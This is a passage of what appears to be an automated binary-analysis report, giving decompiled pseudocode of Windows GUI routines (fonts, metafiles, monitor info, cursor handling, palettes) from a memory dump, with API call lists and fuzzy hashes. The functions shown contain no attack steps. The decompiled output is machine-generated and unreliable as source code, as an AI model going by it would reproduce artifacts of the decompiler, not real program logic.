                                  					_v28 = MulDiv( *(_t68 + 0xc), _v24 & 0x0000ffff, 0x9ec);
                                  					_v26 = MulDiv( *(_t68 + 0x10), _v24 & 0x0000ffff, 0x9ec);
                                  					_v18 = E0042A63C( &_v38);
                                  					_v16 = GetDC(0);
                                  					_push(_t84);
                                  					_push(0x42c3c7);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t87;
                                  					_v12 = GetWinMetaFileBits( *(_t68 + 8), 0, 0, 8, _v16);
                                  					_v8 = E00402AE4(_v12, 0, 0x16);
                                  					_push(_t84);
                                  					_push(0x42c3a7);
                                  					_push( *[fs:eax]);
                                  					 *[fs:eax] = _t87;
                                  					if(GetWinMetaFileBits( *(_t68 + 8), _v12, _v8, 8, _v16) < _v12) {
                                  						E0042982C(_t68);
                                  					}
                                  					E0041F138(_t81, 0x16,  &_v38);
                                  					E0041F138(_t81, _v12, _v8);
                                  					_pop(_t78);
                                  					 *[fs:eax] = _t78;
                                  					_push(0x42c3ae);
                                  					return E00402B14(_v8);
                                  				}
                                  			}

                                  APIs
                                  • MulDiv.KERNEL32 ref: 0042C2DE
                                  • MulDiv.KERNEL32 ref: 0042C2F5
                                  • GetDC.USER32(00000000), ref: 0042C30C
                                  • GetWinMetaFileBits.GDI32(?,00000000,00000000,00000008,?), ref: 0042C330
                                  • GetWinMetaFileBits.GDI32(?,?,?,00000008,?), ref: 0042C363
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: BitsFileMeta
                                  • String ID: `
                                  • API String ID: 858000408-2679148245
                                  • Opcode ID: c2876821db35264e58642f0b4257e84df2083e223ced9104b27bbf2a6ebd2475
                                  • Instruction ID: 7a00dac7b19b6f066b125360e2b75f073ca423e1ecba561980a79504bd7ac281
                                  • Opcode Fuzzy Hash: c2876821db35264e58642f0b4257e84df2083e223ced9104b27bbf2a6ebd2475
                                  • Instruction Fuzzy Hash: 7831A775B00208ABDB00DFD5D881AAEB7B8EF09710F5144A6FD04FB281D6799E11D7A9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 88%
                                  			E00465498(void* __eax, void* __ebx, void* __ecx, void* __edi) {
                                  				char _v5;
                                  				struct tagLOGFONTA _v65;
                                  				struct tagLOGFONTA _v185;
                                  				struct tagLOGFONTA _v245;
                                  				void _v405;
                                  				void* _t23;
                                  				void* _t30;
                                  				intOrPtr _t38;
                                  				struct HFONT__* _t41;
                                  				struct HFONT__* _t45;
                                  				struct HFONT__* _t49;
                                  				intOrPtr _t52;
                                  				intOrPtr _t54;
                                  				void* _t57;
                                  				void* _t72;
                                  				void* _t74;
                                  				void* _t75;
                                  				intOrPtr _t76;
                                  
                                  				_t72 = __edi;
                                  				_t74 = _t75;
                                  				_t76 = _t75 + 0xfffffe6c;
                                  				_t57 = __eax;
                                  				_v5 = 0;
                                  				if( *0x4bcb7c != 0) {
                                  					_t54 =  *0x4bcb7c; // 0x1c41284
                                  					_v5 =  *((intOrPtr*)(_t54 + 0x88));
                                  				}
                                  				_push(_t74);
                                  				_push(0x4655dd);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t76;
                                  				if( *0x4bcb7c != 0) {
                                  					_t52 =  *0x4bcb7c; // 0x1c41284
                                  					E00467ACC(_t52, 0);
                                  				}
                                  				if(SystemParametersInfoA(0x1f, 0x3c,  &_v65, 0) == 0) {
                                  					_t23 = GetStockObject(0xd);
                                  					_t7 = _t57 + 0x84; // 0x38004010
                                  					E0042864C( *_t7, _t23, _t72);
                                  				} else {
                                  					_t49 = CreateFontIndirectA( &_v65);
                                  					_t6 = _t57 + 0x84; // 0x38004010
                                  					E0042864C( *_t6, _t49, _t72);
                                  				}
                                  				_v405 = 0x154;
                                  				if(SystemParametersInfoA(0x29, 0,  &_v405, 0) == 0) {
                                  					_t14 = _t57 + 0x80; // 0xe8000000
                                  					E00428730( *_t14, 8);
                                  					_t30 = GetStockObject(0xd);
                                  					_t15 = _t57 + 0x88; // 0x90000000
                                  					E0042864C( *_t15, _t30, _t72);
                                  				} else {
                                  					_t41 = CreateFontIndirectA( &_v185);
                                  					_t11 = _t57 + 0x80; // 0xe8000000
                                  					E0042864C( *_t11, _t41, _t72);
                                  					_t45 = CreateFontIndirectA( &_v245);
                                  					_t13 = _t57 + 0x88; // 0x90000000
                                  					E0042864C( *_t13, _t45, _t72);
                                  				}
                                  				_t16 = _t57 + 0x80; // 0xe8000000
                                  				E00428490( *_t16, 0xff000017);
                                  				_t17 = _t57 + 0x88; // 0x90000000
                                  				E00428490( *_t17, 0xff000007);
                                  				 *[fs:eax] = 0xff000007;
                                  				_push(0x4655e4);
                                  				if( *0x4bcb7c != 0) {
                                  					_t38 =  *0x4bcb7c; // 0x1c41284
                                  					return E00467ACC(_t38, _v5);
                                  				}
                                  				return 0;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(0000001F,0000003C,?,00000000), ref: 004654EC
                                  • CreateFontIndirectA.GDI32(?), ref: 004654F9
                                  • GetStockObject.GDI32(0000000D), ref: 0046550F
                                    • Part of subcall function 00428730: MulDiv.KERNEL32 ref: 0042873D
                                  • SystemParametersInfoA.USER32(00000029,00000000,00000154,00000000), ref: 00465538
                                  • CreateFontIndirectA.GDI32(?), ref: 00465548
                                  • CreateFontIndirectA.GDI32(?), ref: 00465561
                                  • GetStockObject.GDI32(0000000D), ref: 00465587
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CreateFontIndirect$InfoObjectParametersStockSystem
                                  • String ID:
                                  • API String ID: 2891467149-0
                                  • Opcode ID: 197793e789b355ee09b14fd3a8cc8c79d52eebfba29a54b9cc7f2a23b13e6e63
                                  • Instruction ID: 0f2b3b07d933e9619f7380dc23c3e3438e4ecac46f2b85bfedb5d5816808db95
                                  • Opcode Fuzzy Hash: 197793e789b355ee09b14fd3a8cc8c79d52eebfba29a54b9cc7f2a23b13e6e63
                                  • Instruction Fuzzy Hash: AC31D930704204ABE750FB79DC82B9D37A5AB44304F54807BB948DB396EE7C9805CB2E
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 54%
                                  			E00455B00(void* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
                                  				intOrPtr _v8;
                                  				void* __ecx;
                                  				intOrPtr _t9;
                                  				void* _t11;
                                  				intOrPtr _t17;
                                  				void* _t28;
                                  				void* _t29;
                                  				intOrPtr _t33;
                                  				intOrPtr _t34;
                                  				intOrPtr _t37;
                                  				struct HINSTANCE__* _t41;
                                  				void* _t43;
                                  				intOrPtr _t45;
                                  				intOrPtr _t46;
                                  
                                  				_t45 = _t46;
                                  				_push(_t29);
                                  				_push(__ebx);
                                  				_t43 = __edx;
                                  				_t28 = __eax;
                                  				if( *0x4bcb64 == 0) {
                                  					 *0x4bcb64 = E0040D364("comctl32.dll", __eax, _t29);
                                  					if( *0x4bcb64 >= 0x60000) {
                                  						_t41 = GetModuleHandleA("comctl32.dll");
                                  						if(_t41 != 0) {
                                  							 *0x4bcb68 = GetProcAddress(_t41, "ImageList_WriteEx");
                                  						}
                                  					}
                                  				}
                                  				_v8 = E00425AD4(_t43, 1, 0);
                                  				_push(_t45);
                                  				_push(0x455bfa);
                                  				_push( *[fs:eax]);
                                  				 *[fs:eax] = _t46;
                                  				if( *0x4bcb68 == 0) {
                                  					_t9 = _v8;
                                  					if(_t9 != 0) {
                                  						_t9 = _t9 - 0xffffffec;
                                  					}
                                  					_push(_t9);
                                  					_t11 = E004546DC(_t28);
                                  					_push(_t11);
                                  					L0042FD68();
                                  					if(_t11 == 0) {
                                  						_t33 =  *0x4baeb8; // 0x4263fc
                                  						E0040CB80(_t33, 1);
                                  						E00403DEC();
                                  					}
                                  				} else {
                                  					_t17 = _v8;
                                  					if(_t17 != 0) {
                                  						_t17 = _t17 - 0xffffffec;
                                  					}
                                  					_push(_t17);
                                  					_push(1);
                                  					_push(E004546DC(_t28));
                                  					if( *0x4bcb68() != 0) {
                                  						_t34 =  *0x4baeb8; // 0x4263fc
                                  						E0040CB80(_t34, 1);
                                  						E00403DEC();
                                  					}
                                  				}
                                  				_pop(_t37);
                                  				 *[fs:eax] = _t37;
                                  				_push(0x455c01);
                                  				return E0040360C(_v8);
                                  			}

                                  APIs
                                    • Part of subcall function 0040D364: 73211C9C.VERSION(00000000,?,00000000,0040D43A), ref: 0040D3A6
                                    • Part of subcall function 0040D364: 73211CED.VERSION(00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3DB
                                    • Part of subcall function 0040D364: 73211B72.VERSION(?,0040D44C,?,?,00000000,?,00000000,?,00000000,0040D41D,?,00000000,?,00000000,0040D43A), ref: 0040D3F5
                                  • GetModuleHandleA.KERNEL32(comctl32.dll), ref: 00455B34
                                  • GetProcAddress.KERNEL32(00000000,ImageList_WriteEx,comctl32.dll), ref: 00455B45
                                  • 73F66DBD.COMCTL32(00000000,?,00000000,00455BFA), ref: 00455BC4
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: 73211$AddressHandleModuleProc
                                  • String ID: ImageList_WriteEx$comctl32.dll$comctl32.dll
                                  • API String ID: 2983770667-3125200627
                                  • Opcode ID: 0e8971f3872d7cf69b3e185884f1fff5c021e66f0f65a354f811e2e6d261d0e9
                                  • Instruction ID: 7a979c24bf6d79b10fc0f01f6174f2a17f9497eddf0375a88709807080ad289e
                                  • Opcode Fuzzy Hash: 0e8971f3872d7cf69b3e185884f1fff5c021e66f0f65a354f811e2e6d261d0e9
                                  • Instruction Fuzzy Hash: E3219570704A009BD714EF75EDAAB7A76A99B44B19B10013BFC01D73A2DA7DBC48C61D
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E004301C8(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x4bc931 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00406CD4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x4bc918; // 0x4301c8
                                  					 *0x4bc918 = E0042FDB8(5, _t23, "GetMonitorInfoA", _t26, _t29);
                                  					_t24 =  *0x4bc918(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}

                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 00430220
                                  • GetSystemMetrics.USER32 ref: 00430235
                                  • GetSystemMetrics.USER32 ref: 00430240
                                  • lstrcpy.KERNEL32 ref: 0043026A
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoA
                                  • API String ID: 2545840971-1370492664
                                  • Opcode ID: 5d7acdd16e0bc1ad2a849c78d3370ffc818a1f3e2c50f723f1c29fd45b8223ab
                                  • Instruction ID: 778f1a88cd6496855ded8dc2a594a789e4854bf79e375633c516c23e18d0b801
                                  • Opcode Fuzzy Hash: 5d7acdd16e0bc1ad2a849c78d3370ffc818a1f3e2c50f723f1c29fd45b8223ab
                                  • Instruction Fuzzy Hash: 49110375A01304AFEB20CF689CC8BA7B7E8EF09710F00063AE955A7251D3B4AC4087A8
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 47%
                                  			E0043029C(intOrPtr _a4, intOrPtr* _a8) {
                                  				void _v20;
                                  				void* __ebx;
                                  				void* __esi;
                                  				void* __ebp;
                                  				void* _t23;
                                  				int _t24;
                                  				intOrPtr _t26;
                                  				intOrPtr _t27;
                                  				intOrPtr* _t29;
                                  				intOrPtr* _t31;
                                  
                                  				_t29 = _a8;
                                  				_t27 = _a4;
                                  				if( *0x4bc932 != 0) {
                                  					_t24 = 0;
                                  					if(_t27 == 0x12340042 && _t29 != 0 &&  *_t29 >= 0x28 && SystemParametersInfoA(0x30, 0,  &_v20, 0) != 0) {
                                  						 *((intOrPtr*)(_t29 + 4)) = 0;
                                  						 *((intOrPtr*)(_t29 + 8)) = 0;
                                  						 *((intOrPtr*)(_t29 + 0xc)) = GetSystemMetrics(0);
                                  						 *((intOrPtr*)(_t29 + 0x10)) = GetSystemMetrics(1);
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						asm("movsd");
                                  						_t31 = _t29;
                                  						 *(_t31 + 0x24) = 1;
                                  						if( *_t31 >= 0x4c) {
                                  							_push("DISPLAY");
                                  							_push(_t31 + 0x28);
                                  							L00406CD4();
                                  						}
                                  						_t24 = 1;
                                  					}
                                  				} else {
                                  					_t26 =  *0x4bc91c; // 0x43029c
                                  					 *0x4bc91c = E0042FDB8(6, _t23, "GetMonitorInfoW", _t26, _t29);
                                  					_t24 =  *0x4bc91c(_t27, _t29);
                                  				}
                                  				return _t24;
                                  			}













                                  APIs
                                  • SystemParametersInfoA.USER32(00000030,00000000,?,00000000), ref: 004302F4
                                  • GetSystemMetrics.USER32 ref: 00430309
                                  • GetSystemMetrics.USER32 ref: 00430314
                                  • lstrcpy.KERNEL32 ref: 0043033E
                                    • Part of subcall function 0042FDB8: GetProcAddress.KERNEL32(75490000,00000000,00000000,0042FE82), ref: 0042FE3C
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: System$Metrics$AddressInfoParametersProclstrcpy
                                  • String ID: DISPLAY$GetMonitorInfoW
                                  • API String ID: 2545840971-2774842281
                                  • Opcode ID: d6540120b03763d89d3505b817fe88370fcbab0dfc7e112a9e46c7f4792aadd8
                                  • Instruction ID: af960cf9f872d7ed926445b6a3aa41c5da80037a6bffc8b5ee27f2ab9e0b3b9d
                                  • Opcode Fuzzy Hash: d6540120b03763d89d3505b817fe88370fcbab0dfc7e112a9e46c7f4792aadd8
                                  • Instruction Fuzzy Hash: 4611D671A017049FE7608F619CC5BA7B7E8EF09310F10463BED599B291D778A904CBA9
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 75%
                                  			E0042C910(int __eax, void* __ecx, intOrPtr __edx) {
                                  				intOrPtr _v8;
                                  				struct HDC__* _v12;
                                  				struct HDC__* _v16;
                                  				void* _v20;
                                  				struct tagRGBQUAD _v1044;
                                  				int _t16;
                                  				int _t37;
                                  				intOrPtr _t44;
                                  				void* _t46;
                                  				void* _t49;
                                  				void* _t51;
                                  				intOrPtr _t52;
                                  
                                  				_t16 = __eax;
                                  				_t49 = _t51;
                                  				_t52 = _t51 + 0xfffffbf0;
                                  				_v8 = __edx;
                                  				_t46 = __eax;
                                  				if(__eax == 0 ||  *((short*)(__ecx + 0x26)) > 8) {
                                  					L4:
                                  					return _t16;
                                  				} else {
                                  					_t16 = E0042A074(_v8, 0xff,  &_v1044);
                                  					_t37 = _t16;
                                  					if(_t37 == 0) {
                                  						goto L4;
                                  					} else {
                                  						_v12 = GetDC(0);
                                  						_v16 = CreateCompatibleDC(_v12);
                                  						_v20 = SelectObject(_v16, _t46);
                                  						_push(_t49);
                                  						_push(0x42c9bf);
                                  						_push( *[fs:eax]);
                                  						 *[fs:eax] = _t52;
                                  						SetDIBColorTable(_v16, 0, _t37,  &_v1044);
                                  						_pop(_t44);
                                  						 *[fs:eax] = _t44;
                                  						_push(0x42c9c6);
                                  						SelectObject(_v16, _v20);
                                  						DeleteDC(_v16);
                                  						return ReleaseDC(0, _v12);
                                  					}
                                  				}
                                  			}















                                  APIs
                                    • Part of subcall function 0042A074: GetObjectA.GDI32(?,00000004), ref: 0042A08B
                                    • Part of subcall function 0042A074: GetPaletteEntries.GDI32(?,00000000,?,?), ref: 0042A0AE
                                  • GetDC.USER32(00000000), ref: 0042C94E
                                  • CreateCompatibleDC.GDI32(?), ref: 0042C95A
                                  • SelectObject.GDI32(?), ref: 0042C967
                                  • SetDIBColorTable.GDI32(?,00000000,00000000,?), ref: 0042C98B
                                  • SelectObject.GDI32(?,?), ref: 0042C9A5
                                  • DeleteDC.GDI32(?), ref: 0042C9AE
                                  • ReleaseDC.USER32(00000000,?), ref: 0042C9B9
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: Object$Select$ColorCompatibleCreateDeleteEntriesPaletteReleaseTable
                                  • String ID:
                                  • API String ID: 4046155103-0
                                  • Opcode ID: eb2f09f46152e42e0302b3d2ec58d1cfcc2a1c4c4f2c1ea1e6191820d04333f0
                                  • Instruction ID: 25070bdc39e239a1cc3928b6de81c0463c4aa06ed26b45da8391fb775581838c
                                  • Opcode Fuzzy Hash: eb2f09f46152e42e0302b3d2ec58d1cfcc2a1c4c4f2c1ea1e6191820d04333f0
                                  • Instruction Fuzzy Hash: 11116AB2E042197BDB10DFE5DC81AAEB3BCEF48704F4145B6F504E7281D6799E504758
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 94%
                                  			E00465408(long __eax, void* __ecx, short __edx) {
                                  				struct tagPOINT _v24;
                                  				long _t7;
                                  				long _t12;
                                  				long _t19;
                                  				void* _t21;
                                  				struct HWND__* _t27;
                                  				short _t28;
                                  				void* _t30;
                                  				struct tagPOINT* _t31;
                                  
                                  				_t21 = __ecx;
                                  				_t7 = __eax;
                                  				_t31 = _t30 + 0xfffffff8;
                                  				_t28 = __edx;
                                  				_t19 = __eax;
                                  				if(__edx ==  *((intOrPtr*)(__eax + 0x44))) {
                                  					L6:
                                  					 *((intOrPtr*)(_t19 + 0x48)) =  *((intOrPtr*)(_t19 + 0x48)) + 1;
                                  				} else {
                                  					 *((short*)(__eax + 0x44)) = __edx;
                                  					if(__edx != 0) {
                                  						L5:
                                  						_t7 = SetCursor(E004653CC(_t19, _t21, _t28));
                                  						goto L6;
                                  					} else {
                                  						GetCursorPos(_t31);
                                  						_push(_v24.y);
                                  						_t27 = WindowFromPoint(_v24);
                                  						if(_t27 == 0) {
                                  							goto L5;
                                  						} else {
                                  							_t12 = GetWindowThreadProcessId(_t27, 0);
                                  							if(_t12 != GetCurrentThreadId()) {
                                  								goto L5;
                                  							} else {
                                  								_t7 = SendMessageA(_t27, 0x20, _t27, E004074FC(SendMessageA(_t27, 0x84, 0, E0040759C(_t31, _t21)), 0x200));
                                  							}
                                  						}
                                  					}
                                  				}
                                  				return _t7;
                                  			}












                                  APIs
                                  • GetCursorPos.USER32 ref: 00465423
                                  • WindowFromPoint.USER32 ref: 00465430
                                  • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0046543E
                                  • GetCurrentThreadId.KERNEL32(00000000,00000000,?,?), ref: 00465445
                                  • SendMessageA.USER32 ref: 0046545E
                                  • SendMessageA.USER32 ref: 00465475
                                  • SetCursor.USER32(00000000), ref: 00465487
                                  Memory Dump Source
                                  • Source File: 00000009.00000002.685422392.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                  • Associated: 00000009.00000002.685395255.0000000000400000.00000002.00020000.sdmp
                                  • Associated: 00000009.00000002.685801946.00000000004A0000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685830751.00000000004A2000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685920432.00000000004BC000.00000004.00020000.sdmp
                                  • Associated: 00000009.00000002.685937291.00000000004BE000.00000008.00020000.sdmp
                                  • Associated: 00000009.00000002.685966087.00000000004C2000.00000002.00020000.sdmp
                                  Similarity
                                  • API ID: CursorMessageSendThreadWindow$CurrentFromPointProcess
                                  • String ID:
                                  • API String ID: 1770779139-0
                                  • Opcode ID: 88b484d038cc02734c2dc90dc462b37fc91989a89aedb65f05f8813fb676d397
                                  • Instruction ID: 9fc41d2593eb3400b1b8e62b4a648277ebb3b754d540924fa76a9c18da867d3c
                                  • Opcode Fuzzy Hash: 88b484d038cc02734c2dc90dc462b37fc91989a89aedb65f05f8813fb676d397
                                  • Instruction Fuzzy Hash: E701882260964425D62036754C86F7F39689B84B55F1040BFBE04BA2C3FE7DAC41A26F
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 87%
                                  			E0049AC24(intOrPtr __eax, struct HDC__* __edx, void* __fp0) {
                                  				intOrPtr _v8;
                                  				intOrPtr _v12;
                                  				intOrPtr _v16;
                                  				intOrPtr _v20;
                                  				char _v21;
                                  				struct tagRECT _v37;
                                  				struct tagRECT _v53;
                                  				void* __edi;
                                  				void* __ebp;
                                  				intOrPtr _t270;
                                  				intOrPtr _t272;
                                  				intOrPtr _t459;
                                  				intOrPtr _t489;
                                  				signed int _t491;
                                  				intOrPtr _t498;
                                  				struct HDC__* _t531;
                                  				intOrPtr _t535;
                                  				void* _t537;
                                  				void* _t539;
                                  				intOrPtr _t540;
                                  
                                  				_t537 = _t539;
                                  				_t540 = _t539 + 0xffffffcc;
                                  				_t531 = __edx;
                                  				_v8 = __eax;
                                  				_t270 = _v8;
                                  				_t489 =  *0x49b30c; // 0x0
                                  				_t542 = _t489 -  *((intOrPtr*)(_t270 + 0x208));
                                  				if(_t489 ==  *((intOrPtr*)(_t270 + 0x208))) {
                                  					return _t270;
                                  				} else {
                                  					_t272 =  *((intOrPtr*)(_v8 + 0x20a));
                                  					_t491 =  *((intOrPtr*)(_v8 + 0x209));
                                  					_t464 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
                                  					_v21 = _t272 + _t491 + _t272 + _t272 + _t491 + _t491 * 2 - 3;
                                  					_t459 =  *((intOrPtr*)(E0049B330(_v8, _t542) + 0x40));
                                  					_t535 =  *((intOrPtr*)(E0049B330(_v8, _t542) + 0x40));
                                  					if(0 > 0xb) {
                                  						L9:
                                  						_v16 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
                                  						_v20 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
                                  						_t459 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
                                  						_t535 =  *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40));
                                  					} else {
                                  						switch( *((intOrPtr*)(0 +  &M0049AC97))) {
                                  							case 0:
                                  								_v16 = E0048A3D8( *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40)), 0x13, __fp0);
                                  								_v20 = E0048A498( *((intOrPtr*)(E0049B330(_v8, 0 - 0xb) + 0x40)), 0xffffffce, __fp0);
                                  								goto L10;
                                  							case 1:
                                  								goto L9;
                                  							case 2:
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								_v16 = __eax;
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								_v20 = __eax;
                                  								goto L10;
                                  							case 3:
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								__edx = 0xffffffe2;
                                  								__eax = E0048A498(__eax, 0xffffffe2, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								__eax = E0048A498(__eax, 0xffffffce, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								_v16 = __eax;
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffe7;
                                  								__eax = E0048A498(__eax, 0xffffffe7, __fp0);
                                  								_v20 = __eax;
                                  								goto L10;
                                  							case 4:
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								__eax = E0048A498(__eax, 0xffffffce, __fp0);
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								_v16 = __eax;
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0x13;
                                  								__eax = E0048A3D8(__eax, 0x13, __fp0);
                                  								_v20 = __eax;
                                  								goto L10;
                                  							case 5:
                                  								__eax = _v8;
                                  								__eax = E0049B330(_v8, __eflags);
                                  								__eax =  *((intOrPtr*)(__eax + 0x40));
                                  								__edx = 0xffffffce;
                                  								__eax = E0048A498(__eax, 0xffffffce, __fp0);
                                  								__eax = _v8;
